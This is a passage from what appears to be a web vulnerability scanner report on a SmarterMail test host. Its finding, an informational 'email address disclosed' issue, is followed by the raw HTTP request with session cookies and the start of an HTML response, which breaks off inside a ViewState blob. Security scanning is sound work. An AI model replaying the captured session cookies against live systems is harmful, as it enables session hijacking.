$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"5:00 PM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$condition2_timeofday\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_condition2_timeofday_dateInput_ClientState","dateFormat":"h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Year":2,"Month":0,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":true},"displayDateFormat":"h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_condition2_timeofday_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_condition2_timeofday","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_condition2_timeofday_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_condition2_timeofday_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "", ResolvedHoverImageUrl : ""},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_condition2_timeofday_popupButton","_timePopupControlID":"ctl00_MPH_condition2_timeofday_timePopupLink","clientStateFieldID":"ctl00_MPH_condition2_timeofday_ClientState","focusedDate":"2010-10-02-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"dateInput":"ctl00_MPH_condition2_timeofday_dateInput","timeView":"ctl00_MPH_condition2_timeofday_timeView"}, $get("ctl00_MPH_condition2_timeofday"));
});
$(function() { $('#ctl00_MPH_ctl02').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl02_hm0":"DoEdit_ctl00_BPH_btnEdit();","ctl00_MPH_ctl02_hm1":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


7.3. http://vulnerable.smartermail.site:9998/Main/Calendar/frmEvent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/Calendar/frmEvent.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Main/frmCalendar.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1783686302","TopBarSection":"UserTasks","RootLPSize":300}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 21:01:18 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 75803



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmEvent.aspx?popup=true" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTE5MDk3MzY0MA8WCh4IX19fVGl0bGUFC015IENhbGVuZGFyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDF9fRE9OVElOVklURWgeDF9fUmVjdXJyZW5jZWgWAmYPZBYCAgEPZBYMAgIPZBYCAgEPFgIeB1Zpc2libGVoZAIDD2QWBAIBD2QWAgIFDw8WAh8FaGRkAgMPZBYCAgEPDxYEHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUPd2luZG93LmNsb3NlKCk7HgtOYXZpZ2F0ZVVSTGVkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8FaGQCBg8WAh8FaGQCBw9kFgJmD2QWAgIBDxYCHwVoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFggCAg9kFgICAQ9kFhJmD2QWAgIBD2QWAmYPDxYEHgVXaWR0aBsAAAAAAMByQAEAAAAeBF8hU0ICgAJkZAIBD2QWBGYPDxYGHghDc3NDbGFzcwUMSW5kZW50IEZpeGVkHwkFMjxhIGhyZWY9ImphdmFzY3JpcHQ6IG9wZW5wb3B1cHRvKCk7Ij5BdHRlbmRlZXM8L2E+HwsCAmRkAgEPDxYEHwwFCCBTZXR0aW5nHwsCAmQWBGYPFCsAAg8WIh4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeD1Nob3dUb2dnbGVJbWFnZWgeBFNraW4FDFNtYXJ0ZXJUb29scx4WRW5hYmxlVmlydHVhbFNjcm9sbGluZ2geEkl0ZW1SZXF1ZXN0VGltZW91dALNAh4aU2hvd0Ryb3BEb3duT25UZXh0Ym94Q2xpY2toHhNFbmFibGVFbWJlZGRlZFNraW5zaB4TQ2xvc2VEcm9wRG93bk9uQmx1cmceD0FsbG93Q3VzdG9tVGV4dGceEEV4cGFuZEVhc2luZ1R5cGULKXVUZWxlcmlrLldlYi5VSS5BbmltYXRpb25UeXBlLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQAHhJDb2xsYXBzZUVhc2luZ1R5cGULKwQAHhVBdXRvQ29tcGxldGVTZXBhcmF0b3IFATseEkVuYWJsZUxvYWRPbkRlbWFuZGceF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB4SU2hvd01vcmVSZXN1bHRzQm94aB4TRW5hYmxlVGV4dFNlbGVjdGlvbmgeHkNoYW5nZVRleHRPbktleUJvYXJkTmF2aWdhdGlvbmdkZBYEZg8PFgQfDAUJcmNiSGVhZGVyHwsCAmRkAgEPDxYEHwwFCXJjYkZvb3Rlch8LAgJkZAICDw8WBh8JBRJDaGVjayBBdmFpbGFiaWxpdHkeCEltYWdlVXJsBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9HYWFudC5naWYeC05hdmlnYXRlVXJsBR1qYXZhc2NyaXB0OiBEb0F2YWlsYWJpbGl0eSgpO2RkAgIPZBYCAgEPZBYCZg8PFgQfChsAAAAAAMByQAEAAAAfCwKAAmRkAgMPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYEZg8PFhAfDWgfE2gfDwUMU21hcnRlclRvb2xzHgdNYXhEYXRlBgAA25l6PzEJHwsCAh4MU2VsZWN0ZWREYXRlBgAa1H8cMc2IHwwFFkRhdGVUaW1lUGlja2VyT3ZlcnJpZGUeB01pbkRhdGUGAEBXIFMFUQhkFgpmDxQrAAgPFhgfDWgeDU9yaWdpbmFsVmFsdWUFFDEwLzMvMjAxMCA5OjE1OjAwIEFNHxNoHw8FDFNtYXJ0ZXJUb29scx4MQXV0b1Bvc3RCYWNrZx4KRGF0ZUZvcm1hdAUBZx4RRGlzcGxheURhdGVGb3JtYXRkHwkFEzIwMTAtMTAtMDMtMDktMTUtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWwfGmgfIAYAANuZej8xCR8iBgBAVyBTBVEIZBYGHwobAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUhvdmVyHwsCggIWBh8KGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFcnJvch8LAoICFgYfChsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRm9jdXNlZB8LAoICFgYfChsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRW5hYmxlZB8LAoICFgYfChsAAAAAAABZQAcAAAAfDAUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfCwKCAhYGHwobAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUVtcHR5HwsCggIWBh8KGwAAAAAAAFlABwAAAB8MBRByaVRleHRCb3ggcmlSZWFkHwsCggJkAgEPDxYEHx4FMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmHg1Ib3ZlckltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHgdvbmNsaWNrBUtyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1N0YXJ0RGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCcpLCdjYWwnKTtkAgIPFCsADQ8WGgUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFEUVuYWJsZU11bHRpU2VsZWN0aAUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAVyBTBVEIBQNFUlNoBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUSTmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWF4RAYAANuZej8xCQ8WCB8PBQxTbWFydGVyVG9vbHMfE2gfDWgfGmhkZBYEHwwFC3JjTWFpblRhYmxlHwsCAhYEHwwFDHJjT3RoZXJNb250aB8LAgJkFgQfDAUKcmNTZWxlY3RlZB8LAgJkFgQfDAUKcmNEaXNhYmxlZB8LAgIWBB8MBQxyY091dE9mUmFuZ2UfCwICFgQfDAUJcmNXZWVrZW5kHwsCAhYEHwwFB3JjSG92ZXIfCwICFgQfDAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHwsCAhYEHwwFCXJjVmlld1NlbB8LAgJkAgMPDxYEHx4FLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZh8oBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYWAh8pBUxyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1N0YXJ0RGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCcpLCd0aW1lJyk7ZAIEDxQrAAIPFg4eCVN0YXJ0VGltZSgpXFN5c3RlbS5UaW1lU3BhbiwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CDA3OjAwOjAwHgdFbmRUaW1lKCsFCDE5OjAwOjAwHghJbnRlcnZhbCgrBQgwMDoxNTowMB8NaB8TaB8PBQxTbWFydGVyVG9vbHMfGmhkFgQfDAUHcmNIb3Zlch8LAgIWAmYPFCsACQ8WBh4NUmVwZWF0Q29sdW1ucwIEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIwZBYEHwxlHwsCAmQWBB8MZR8LAgJkZBYEHwwFCHJjSGVhZGVyHwsCAhYEHwwFCHJjRm9vdGVyHwsCAhYGHwobAAAAAABAb0ABAAAAHwwFNFJhZENhbGVuZGFyVGltZVZpZXcgUmFkQ2FsZW5kYXJUaW1lVmlld19TbWFydGVyVG9vbHMfCwKC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b3B1cCgkZmluZCgnY3RsMDBfTVBIX0VuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwnY2FsJyk7ZAICDxQrAA0PFhoFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBRFFbmFibGVNdWx0aVNlbGVjdGgFD1JlbmRlckludmlzaWJsZWcFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUETWluRAYAQFcgUwVRCAUDRVJTaAUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1heEQGAADbmXo/MQkPFggfDwUMU21hcnRlclRvb2xzHxNoHw1oHxpoZGQWBB8MBQtyY01haW5UYWJsZR8LAgIWBB8MBQxyY090aGVyTW9udGgfCwICZBYEHwwFCnJjU2VsZWN0ZWQfCwICZBYEHwwFCnJjRGlzYWJsZWQfCwICFgQfDAUMcmNPdXRPZlJhbmdlHwsCAhYEHwwFCXJjV2Vla2VuZB8LAgIWBB8MBQdyY0hvdmVyHwsCAhYEHwwFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8LAgIWBB8MBQlyY1ZpZXdTZWwfCwICZAIDDw8WBB8eBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYfKAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmFgIfKQVKcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9FbmREYXRlUGlja2VyX1NldHRpbmdUZXh0JyksJ3RpbWUnKTtkAgQPFCsAAg8WDh8qKCsFCDA3OjAwOjAwHysoKwUIMTk6MDA6MDAfLCgrBQgwMDoxNTowMB8NaB8TaB8PBQxTbWFydGVyVG9vbHMfGmhkFgQfDAUHcmNIb3Zlch8LAgIWAmYPFCsACQ8WBh8tAgQfLhYAHy8CMGQWBB8MZR8LAgJkFgQfDGUfCwICZGQWBB8MBQhyY0hlYWRlch8LAgIWBB8MBQhyY0Zvb3Rlch8LAgIWBh8KGwAAAAAAQG9AAQAAAB8MBTRSYWRDYWxlbmRhclRpbWVWaWV3IFJhZENhbGVuZGFyVGltZVZpZXdfU21hcnRlclRvb2xzHwsCggIWYAIBD2QWAmYPFgIfMAUHNzowMCBBTWQCAg9kFgJmDxYCHzAFBzc6MTUgQU1kAgMPZBYCZg8WAh8wBQc3OjMwIEFNZAIED2QWAmYPFgIfMAUHNzo0NSBBTWQCBQ9kFgJmDxYCHzAFBzg6MDAgQU1kAgYPZBYCZg8WAh8wBQc4OjE1IEFNZAIHD2QWAmYPFgIfMAUHODozMCBBTWQCCA9kFgJmDxYCHzAFBzg6NDUgQU1kAgkPZBYCZg8WAh8wBQc5OjAwIEFNZAIKD2QWAmYPFgIfMAUHOToxNSBBTWQCCw9kFgJmDxYCHzAFBzk6MzAgQU1kAgwPZBYCZg8WAh8wBQc5OjQ1IEFNZAIND2QWAmYPFgIfMAUIMTA6MDAgQU1kAg4PZBYCZg8WAh8wBQgxMDoxNSBBTWQCDw9kFgJmDxYCHzAFCDEwOjMwIEFNZAIQD2QWAmYPFgIfMAUIMTA6NDUgQU1kAhEPZBYCZg8WAh8wBQgxMTowMCBBTWQCEg9kFgJmDxYCHzAFCDExOjE1IEFNZAITD2QWAmYPFgIfMAUIMTE6MzAgQU1kAhQPZBYCZg8WAh8wBQgxMTo0NSBBTWQCFQ9kFgJmDxYCHzAFCDEyOjAwIFBNZAIWD2QWAmYPFgIfMAUIMTI6MTUgUE1kAhcPZBYCZg8WAh8wBQgxMjozMCBQTWQCGA9kFgJmDxYCHzAFCDEyOjQ1IFBNZAIZD2QWAmYPFgIfMAUHMTowMCBQTWQCGg9kFgJmDxYCHzAFBzE6MTUgUE1kAhsPZBYCZg8WAh8wBQcxOjMwIFBNZAIcD2QWAmYPFgIfMAUHMTo0NSBQTWQCHQ9kFgJmDxYCHzAFBzI6MDAgUE1kAh4PZBYCZg8WAh8wBQcyOjE1IFBNZAIfD2QWAmYPFgIfMAUHMjozMCBQTWQCIA9kFgJmDxYCHzAFBzI6NDUgUE1kAiEPZBYCZg8WAh8wBQczOjAwIFBNZAIiD2QWAmYPFgIfMAUHMzoxNSBQTWQCIw9kFgJmDxYCHzAFBzM6MzAgUE1kAiQPZBYCZg8WAh8wBQczOjQ1IFBNZAIlD2QWAmYPFgIfMAUHNDowMCBQTWQCJg9kFgJmDxYCHzAFBzQ6MTUgUE1kAicPZBYCZg8WAh8wBQc0OjMwIFBNZAIoD2QWAmYPFgIfMAUHNDo0NSBQTWQCKQ9kFgJmDxYCHzAFBzU6MDAgUE1kAioPZBYCZg8WAh8wBQc1OjE1IFBNZAIrD2QWAmYPFgIfMAUHNTozMCBQTWQCLA9kFgJmDxYCHzAFBzU6NDUgUE1kAi0PZBYCZg8WAh8wBQc2OjAwIFBNZAIuD2QWAmYPFgIfMAUHNjoxNSBQTWQCLw9kFgJmDxYCHzAFBzY6MzAgUE1kAjAPZBYCZg8WAh8wBQc2OjQ1IFBNZAIBDw8WAh8JBRIxMC8zLzIwMTAgMTA6MTUgQU1kZAIFD2QWAgIBD2QWAmYPEA8WAh8JBRNBbGwgRGF5IEFwcG9pbnRtZW50ZGRkZAIGD2QWAgIBD2QWAmYPEGQPFgJmAgEWAhAFBEJ1c3kFBGJ1c3lnEAUERnJlZQUEZnJlZWdkZAIHD2QWAgIBD2QWAmYPEGQPFhdmAgECAgIDAgQCBQIGAgcCCAIJAgoCCwIMAg0CDgIPAhACEQISAhMCFAIVAhYWFxAFBE5vbmUFBE5vbmVnEAUJNSBtaW51dGVzBQk1IG1pbnV0ZXNnEAUKMTAgbWludXRlcwUKMTAgbWludXRlc2cQBQoxNSBtaW51dGVzBQoxNSBtaW51dGVzZxAFCjMwIG1pbnV0ZXMFCjMwIG1pbnV0ZXNnEAUGMSBob3VyBQYxIGhvdXJnEAUHMiBob3VycwUHMiBob3Vyc2cQBQczIGhvdXJzBQczIGhvdXJzZxAFBzQgaG91cnMFBzQgaG91cnNnEAUHNSBob3VycwUHNSBob3Vyc2cQBQc2IGhvdXJzBQc2IGhvdXJzZxAFBzcgaG91cnMFBzcgaG91cnNnEAUHOCBob3VycwUHOCBob3Vyc2cQBQc5IGhvdXJzBQc5IGhvdXJzZxAFCDEwIGhvdXJzBQgxMCBob3Vyc2cQBQgxMSBob3VycwUIMTEgaG91cnNnEAUIMTIgaG91cnMFCDEyIGhvdXJzZxAFCDI0IGhvdXJzBQgyNCBob3Vyc2cQBQYyIGRheXMFBjIgZGF5c2cQBQYzIGRheXMFBjMgZGF5c2cQBQY0IGRheXMFBjQgZGF5c2cQBQYxIHdlZWsFBjEgd2Vla2cQBQcyIHdlZWtzBQcyIHdlZWtzZ2RkAggPZBYCAgEPZBYEZg8PFgQfChsAAAAAAMByQAEAAAAfCwKAAmRkAgIPDxYCHwkFEnRlc3RpdEBob3l0bGxjLmNvbWRkAgQPZBYCAgEPZBYCAgEPZBYCZg9kFgRmD2QWCmYPEA8WAh8JBQRPbmNlZGRkZAICDxAPFgIfCQUFRGFpbHlkZGRkAgQPEA8WAh8JBQZXZWVrbHlkZGRkAgYPEA8WAh8JBQdNb250aGx5ZGRkZAIIDxAPFgIfCQUGWWVhcmx5ZGRkZAIBD2QWCmYPFgIfBWgWBAIBDxAPFgIfCQUFRXZlcnlkZGRkAgcPEA8WAh8JBQ1FdmVyeSB3ZWVrZGF5ZGRkZAIBDxYCHwVoFg4CBw8QDxYEHwkFBlN1bmRheR4HQ2hlY2tlZGdkZGRkAgkPEA8WAh8